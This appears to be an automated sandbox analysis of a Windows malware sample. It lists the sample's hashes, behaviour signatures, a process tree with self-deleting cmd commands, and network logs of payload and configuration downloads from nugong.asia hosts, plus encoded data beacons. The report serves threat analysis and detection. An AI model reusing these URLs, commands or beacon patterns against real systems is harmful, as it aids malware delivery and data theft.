Overview

overview

8

Static

static

3

bc082e85f4...eb.exe

windows7-x64

8

bc082e85f4...eb.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    151s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/10/2023, 17:03 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe

  • Size

    399KB

  • MD5

    6b536c7f28c331c46c88e5e1827f83d0

  • SHA1

    c55b37d2fcbe8c5178f065b7fb08395aafd68dc9

  • SHA256

    bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb

  • SHA512

    7e22107cb788c71459510aef25a2123c058855e03c7c4ea6530f457246b7d84aad965b8cce90ed305d94f66ca8e9699d26e80b03572b13e710738dc77112d5e0

  • SSDEEP

    6144:XKiYJL+K7EQ5vrt5AVfL8haEK4sDzLPFZcEOkCybEaQRXr9HNdvOa:LqEU0Vf4ha0sDzDOkx2LIa

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops file in System32 directory 16 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies Control Panel 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Users\Admin\AppData\Local\Temp\bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe
        "C:\Users\Admin\AppData\Local\Temp\bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe"
        2⤵
        • Checks computer location settings
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2196
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 1
            4⤵
            • Delays execution with timeout.exe
            PID:708
      • C:\Program Files\rdpsign.exe
        "C:\Program Files\rdpsign.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Checks SCSI registry key(s)
        • Modifies Control Panel
        • Suspicious use of AdjustPrivilegeToken
        PID:548
    • C:\Windows\Syswow64\b9de8270
      C:\Windows\Syswow64\b9de8270
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Windows\Syswow64\b9de8270"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4604
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 1
          3⤵
          • Delays execution with timeout.exe
          PID:2468

    Network

    • flag-us
      DNS
      down.nugong.asia
      b9de8270
      Remote address:
      114.114.114.114:53
      Request
      down.nugong.asia
      IN A
      Response
      down.nugong.asia
      IN CNAME
      down.nugong.asia.cdn.dnsv1.com.cn
      down.nugong.asia.cdn.dnsv1.com.cn
      IN CNAME
      ofgk41rd.slt.sched.tdnsv8.com
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      122.189.171.111
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      211.93.212.232
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      221.15.67.145
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.36.226.232
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      58.144.226.248
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.36.226.196
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.56.81.104
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      218.29.50.234
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.231.136.87
    • flag-us
      DNS
      158.240.127.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      158.240.127.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      254.105.26.67.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      254.105.26.67.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip
      b9de8270
      Remote address:
      122.189.171.111:443
      Request
      GET /pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 25 Aug 2023 06:20:12 GMT
      Etag: "9622e382ef8f51e5dc3cfdeaacf2f928"
      Content-Type: application/zip
      Date: Mon, 11 Sep 2023 19:04:34 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 4589936052107238770
      x-cos-request-id: NjRmZjY0YzJfNmNkMTc2MWVfMzQ3M18xNTQ3MjVi
      Content-Length: 462740
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 18237741092755376616
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      114.114.114.114.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      114.114.114.114.in-addr.arpa
      IN PTR
      Response
      114.114.114.114.in-addr.arpa
      IN PTR
      public1114dnscom
    • flag-us
      DNS
      111.171.189.122.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      111.171.189.122.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      140.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      140.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      108.211.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      108.211.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Mon, 11 Sep 2023 18:02:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRmZjU2MzdfNTc5NjdmMGJfMzFjMV9hOTZiMTA=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 4203355729219439325
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Mon, 11 Sep 2023 18:02:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRmZjU2MzdfNTc5NjdmMGJfMzFjMV9hOTZiMTA=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 3481312161968609272
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userchange.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/userchange.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:19:13 GMT
      Etag: "fc45e837e3ce86dbec3d2c37cf4902de"
      Content-Type: text/plain
      Date: Tue, 10 Oct 2023 09:22:22 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 12006462995938776668
      x-cos-request-id: NjUyNTE3Y2VfOTZhMjA4MDlfMTVjMl80NzM3Y2Rk
      Content-Length: 80
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 10905350539667753015
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userpq.zip
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/userpq.zip HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Sun, 15 Oct 2023 12:14:07 GMT
      Etag: "adc490d0b07f1be911590c5b795aebea"
      Content-Type: application/zip
      Date: Sun, 15 Oct 2023 12:17:13 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 2623325120400499928
      x-cos-request-id: NjUyYmQ4NDlfYTBhZmFmMDlfMmE5NF8xNTFmYzZm
      Content-Length: 14048
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 4408665578442023211
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/blacklist.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/blacklist.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 08:12:24 GMT
      Etag: "0df08590c5e267537d4ea37bf856ff07"
      Content-Type: text/plain
      Date: Tue, 10 Oct 2023 08:15:33 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 2970137862095809835
      x-cos-request-id: NjUyNTA4MjVfMTI3NmIyMDlfOWU1MV8zNjliMmVj
      Content-Length: 13312
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 16786581235747152934
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/69f335c8397887d4.json
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/user/c995ec7fd4f57c0d/69f335c8397887d4.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 25 Aug 2023 06:20:14 GMT
      Etag: "9d521f6ead300ca3ecac2f59c201b009"
      Content-Type: application/json
      Date: Mon, 11 Sep 2023 19:04:36 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11522679188396684273
      x-cos-request-id: NjRmZjY0YzRfYzQzNjY4MDlfNzU2MF9iNDQ2YmM=
      Content-Length: 2176
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 12998831159411314338
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ms.json
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/pub/ms.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 17 Oct 2023 06:21:00 GMT
      Etag: "08d385dd32607b44989f5f7d93cfb1a4"
      Content-Type: application/json
      Date: Tue, 17 Oct 2023 06:24:06 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5642918650456635813
      x-cos-request-id: NjUyZTI4ODZfMjhjZDExMGJfMjgzZGNfNDNlMzIxNg==
      Content-Length: 70816
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 9661404336593585327
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ps.json
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/pub/ps.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 17 Oct 2023 06:21:00 GMT
      Etag: "38f11ea8d0226630fb9251be3a7b1e4b"
      Content-Type: application/json
      Date: Tue, 17 Oct 2023 06:24:05 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5867845126828716719
      x-cos-request-id: NjUyZTI4ODRfZDFiNWFmMDlfZWFlYV80MjQ1NTgw
      Content-Length: 14496
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 263157557074778901
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/6e3a93a55cea3a23/557a93a3c14e34f52a4c5d41926016b1dd2f3f7d426160b564.zip
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /pgm/mds/6e3a93a55cea3a23/557a93a3c14e34f52a4c5d41926016b1dd2f3f7d426160b564.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 25 Aug 2023 03:44:04 GMT
      Etag: "98b2cfa00e1b12ee10d1c93ef1d3dedc"
      Content-Type: application/zip
      Date: Mon, 09 Oct 2023 22:18:32 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3940288121217723607
      x-cos-request-id: NjUyNDdjMzhfNTBiMzAzMDlfMTY3Ml80NmExZWQx
      Content-Length: 330316
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 10491646738914027669
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /report/report_data?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042 HTTP/1.1
      Host: nreprot.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Tue, 17 Oct 2023 07:38:27 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      X-Cache-Lookup: Hit From Inner Cluster
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 15260473372039476250
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /report.php?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042 HTTP/1.1
      Host: mprrpt.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.19.1.1 Unicorn
      Date: Tue, 17 Oct 2023 07:38:26 GMT
      Content-Type: application/octet-stream
      Content-Type: text/html
      X-Cache-Lookup: Cache Miss
      Content-Length: 3
      X-NWS-LOG-UUID: 16181278050411485289
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/zbcfg_exe.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/zbcfg_exe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 16 Oct 2023 16:25:58 GMT
      Etag: "964b0b85a18cfe842b0ccfbf6900209a"
      Content-Type: text/plain
      Date: Mon, 16 Oct 2023 16:34:14 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11792530854517344045
      x-cos-request-id: NjUyZDY2MDZfNmRlZjk4MWVfMTZmYjBfNDM4NGU5NQ==
      Content-Length: 1376
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5318320631035226075
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      apps.game.qq.com
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      apps.game.qq.com
      IN A
      Response
      apps.game.qq.com
      IN A
      101.227.134.27
      apps.game.qq.com
      IN A
      101.227.134.49
    • flag-cn
      GET
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      rdpsign.exe
      Remote address:
      101.227.134.27:443
      Request
      GET /comm-htdocs/ip/get_ip.php HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: apps.game.qq.com
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Date: Tue, 17 Oct 2023 07:38:20 GMT
      Content-Type: text/html
      Content-Length: 49
      Connection: close
      Server: swoole-http-server
      Content-Encoding: gzip
    • flag-us
      DNS
      ocsp.digicert.cn
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.cn
      IN A
      Response
      ocsp.digicert.cn
      IN CNAME
      ocsp.digicert.cn.w.cdngslb.com
      ocsp.digicert.cn.w.cdngslb.com
      IN A
      47.246.48.205
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D
      rdpsign.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Tue, 17 Oct 2023 06:39:23 GMT
      Ali-Swift-Global-Savetime: 1697524763
      Via: cache2.l2de2[51,50,200-0,M], cache1.l2de2[52,0], cache1.l2de2[53,0], cache5.nl2[0,-1,200-0,H], cache4.nl2[22,0]
      Age: 3536
      X-Cache: HIT TCP_MEM_HIT dirn:1:61464607
      X-Swift-SaveTime: Tue, 17 Oct 2023 06:39:23 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309816975282998335874e
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      rdpsign.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Tue, 17 Oct 2023 06:49:55 GMT
      Ali-Swift-Global-Savetime: 1697525395
      Via: cache5.l2de2[0,0,200-0,H], cache7.l2de2[1,0], cache8.nl2[0,0,200-0,H], cache4.nl2[1,0]
      Age: 2904
      X-Cache: HIT TCP_MEM_HIT dirn:11:365779980
      X-Swift-SaveTime: Tue, 17 Oct 2023 07:23:36 GMT
      X-Swift-CacheTime: 1579
      Timing-Allow-Origin: *
      EagleId: 2ff6309816975282999326168e
    • flag-us
      DNS
      27.134.227.101.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      27.134.227.101.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      205.48.246.47.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      205.48.246.47.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4
      b9de8270
      Remote address:
      122.189.171.111:443
      Request
      GET /report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4 HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: nreprot.nugong.asia
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Tue, 17 Oct 2023 07:38:22 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 7379929138276653248
      Connection: close
      X-Cache-Lookup: Cache Miss
    • flag-us
      DNS
      sp1.baidu.com
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      sp1.baidu.com
      IN A
      Response
      sp1.baidu.com
      IN CNAME
      www.a.shifen.com
      www.a.shifen.com
      IN CNAME
      www.wshifen.com
      www.wshifen.com
      IN A
      104.193.88.77
      www.wshifen.com
      IN A
      104.193.88.123
    • flag-us
      DNS
      101.14.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.14.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      ocsp.trust-provider.cn
      b9de8270
      Remote address:
      8.8.8.8:53
      Request
      ocsp.trust-provider.cn
      IN A
      Response
      ocsp.trust-provider.cn
      IN CNAME
      ocsp.trust-provider.cn.c.vedcdnlb.com
      ocsp.trust-provider.cn.c.vedcdnlb.com
